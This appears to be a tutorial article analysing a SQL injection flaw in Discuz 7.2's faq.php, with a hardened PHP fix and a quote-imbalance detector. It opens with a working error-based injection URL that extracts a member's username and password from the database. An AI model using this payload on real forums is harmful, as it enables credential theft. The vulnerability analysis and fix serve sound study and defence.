
How to analyze faq.php SQL injection vulnerabilities in Discuz7.2 version

2025-01-15 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/03 Report--

This article explains how to analyze the faq.php SQL injection vulnerability in Discuz 7.2. Many people have questions about this vulnerability, so the editor consulted a range of material and put together a simple, easy-to-follow walkthrough. Hopefully it resolves those doubts; please follow along.

Injection code example:

The code is as follows:

https://www.jb51.net/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2) x from information_schema.tables group by x) a) 23

Vulnerability analysis: by phithon

The code is as follows:

if($action == 'grouppermission') {

    ...

    ksort($gids);
    $groupids = array();
    foreach($gids as $row) {
        $groupids[] = $row[0];
    }
    $query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");

    ...

}

function implodeids($array) {
    if(!empty($array)) {
        return "'".implode("','", is_array($array) ? $array : array($array))."'";
    } else {
        return '';
    }
}

First an array $groupids is defined, then $gids (also an array, namely $_GET['gids']) is iterated; the first element of each value, $row[0], is appended to $groupids.

Why does this operation result in injection?

Discuz applies addslashes() to the GET array globally, so every ' is escaped to \'. If the parameter we pass is gids[1]=', it is escaped to $gids[1]=\'. The assignment $groupids[] = $row[0], applied to that string, takes its first character, which is the backslash: the escape symbol is extracted on its own, separated from the quote it was protecting.

Looking at the code again, the data passes through implodeids() before it is placed into the SQL statement. Look at the implodeids function:

It is a simple function that joins the elements of $groupids with ',' and wraps each in single quotes, returning a string like '1','2','3','4'.

But our array has just pulled out a lone escape character, which escapes a normal ' here, like this:

'1','\','3','4'

Do you see the difference? The fourth single quote is escaped, so the third single quote is now closed by the fifth instead, and whatever follows in that position is no longer inside a string literal. That is why the second gids element in the payload above can be interpreted as SQL rather than as a group id.
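The chain described above, reproduced in a stand-alone script, as an added example rather than Discuz's own code. The helper addslashes_deep() and the function names build_in_clause_original(), build_in_clause_hardened() and has_unbalanced_quotes() are assumptions made for this example, the input arrays are constructed to look like a decoded $_GET['gids'], and the hardened function is one possible fix (force every id to an integer), not the patch the project shipped.

```php
<?php
// Added example, not Discuz's own code: reproduces the escape-stripping chain
// from faq.php?action=grouppermission with constructed input, and shows a
// hardened replacement that forces every group id to an integer.

// Discuz 7.2 ran addslashes() over every GET value. This helper (an
// assumption, not the framework's function) does the same for a nested array.
function addslashes_deep($value)
{
    return is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value);
}

// Same behaviour as the original implodeids(): trusts whatever it is given.
function implodeids_original($array)
{
    if (!empty($array)) {
        return "'" . implode("','", is_array($array) ? $array : array($array)) . "'";
    }
    return '';
}

// The vulnerable step. $row[0] on a string yields its first character, so an
// escaped quote (the two characters \ and ') contributes the backslash alone.
function build_in_clause_original(array $gids)
{
    ksort($gids);
    $groupids = array();
    foreach ($gids as $row) {
        $groupids[] = $row[0];
    }
    return 'WHERE u.groupid IN (' . implodeids_original($groupids) . ')';
}

// Hardened version: group ids are numeric, so accept only digit strings and
// interpolate them as integers. Nested arrays and anything containing a quote
// or backslash are dropped before they can reach the query.
function build_in_clause_hardened(array $gids)
{
    ksort($gids);
    $groupids = array();
    foreach ($gids as $row) {
        if (!is_string($row) || !ctype_digit($row)) {
            continue;
        }
        $groupids[] = (int) $row;
    }
    if (empty($groupids)) {
        return 'WHERE 0';  // no valid ids: match nothing rather than emit IN ()
    }
    return 'WHERE u.groupid IN (' . implode(',', $groupids) . ')';
}

// Detection helper: counts single quotes that are not preceded by a backslash.
// An odd count means a quote has been consumed as an escape and the literal
// boundaries no longer line up, which is exactly the condition described above.
function has_unbalanced_quotes($sql)
{
    $n = preg_match_all("/(?<!\\\\)'/", $sql);
    return ($n % 2) === 1;
}

// Constructed inputs shaped like $_GET['gids'] after URL decoding.
$benign  = addslashes_deep(array(1 => '1', 2 => '2', 3 => '3', 4 => '4'));
$hostile = addslashes_deep(array(1 => '1', 2 => "'", 3 => '3', 4 => '4'));

echo build_in_clause_original($benign), "\n";
echo build_in_clause_original($hostile), "\n";
echo build_in_clause_hardened($hostile), "\n";
echo has_unbalanced_quotes(build_in_clause_original($hostile)) ? "unbalanced\n" : "balanced\n";
```

Run it with the php command-line interpreter. The first line printed is the benign clause; the second is the '1','\','3','4' string from the analysis, for which the quote counter reports an odd number of unescaped quotes; the third shows that the hardened builder discards the non-numeric element entirely, so the same input produces a clause containing only integers and no quoting at all.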

This concludes the analysis of the faq.php SQL injection vulnerability in Discuz 7.2. Combining theory with practice is the best way to learn, so try the analysis for yourself.
